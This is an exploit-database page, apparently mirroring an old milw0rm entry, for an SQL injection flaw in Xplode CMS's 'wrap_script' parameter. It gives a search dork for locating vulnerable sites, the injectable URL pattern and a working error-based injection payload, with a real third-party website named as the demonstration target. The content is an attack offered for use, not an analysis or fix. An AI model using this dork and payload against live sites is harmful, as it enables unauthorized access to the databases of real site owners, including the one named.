[] NeoSense
E X P L O I T S
title author type platform port cve id

Xplode CMS - 'wrap_script' SQL Injection

Author: PLATEN
type: webapps
platform: php
port: 
date_added: 2009-04-07 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d
#---------------------------------------------------------------------------------------------

dork: "Powered by Xplode CMS"

#----------------------------------------------------------------------------------------------

===[ SQL ]===


http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--


#----------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-08]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.